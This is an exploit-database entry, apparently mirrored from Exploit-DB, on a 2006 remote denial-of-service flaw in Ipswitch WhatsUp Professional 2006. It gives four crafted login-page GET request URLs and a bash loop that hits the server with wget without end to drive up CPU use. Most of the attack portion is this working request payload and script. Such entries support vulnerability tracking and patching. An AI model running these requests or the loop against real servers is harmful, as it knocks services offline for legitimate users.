header-logo
Suggest Exploit
vendor:
WhatsUp Professional 2006
by:
SecurityFocus
7.5
CVSS
HIGH
Denial-of-Service
400
CWE
Product Name: WhatsUp Professional 2006
Affected Version From: Ipswitch WhatsUp Professional 2006
Affected Version To: Ipswitch WhatsUp Professional 2006
Patch Exists: YES
Related CWE: N/A
CPE: a:ipswitch:whatsup_professional_2006
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2006

Ipswitch WhatsUp Professional 2006 Remote Denial-of-Service Vulnerability

Ipswitch WhatsUp Professional 2006 is susceptible to a remote denial-of-service vulnerability. This issue is due to the application's failure to properly handle certain HTTP GET requests. This issue allows remote attackers to consume excessive CPU resources on targeted computers, denying service to legitimate users. An example script to exploit this issue is also available.

Mitigation:

Ensure that all software is up to date and patched with the latest security updates.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/16771/info

Ipswitch WhatsUp Professional 2006 is susceptible to a remote denial-of-service vulnerability. This issue is due to the application's failure to properly handle certain HTTP GET requests.

This issue allows remote attackers to consume excessive CPU resources on targeted computers, denying service to legitimate users.

http://www.example.com:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginPassword=&btnLogIn=[Log&In]=&sLoginUserName=
http://www.example.com:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&btnLogIn=[Log&In]=&sLoginPassword=
http://www.example.com:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&sLoginPassword=&In]=&btnLogIn=
http://www.example.com:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&sLoginPassword=&btnLogIn=[Log&In]=

An example script to exploit this issue is also available:

while [ 1 ]
do
wget -O /dev/null http://www.example.com:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginPassword=&b;tnLogIn=[Log&In]=&sLoginUserName=
done

Navigation

Suggest Exploit

Services By CQR

cqrsecured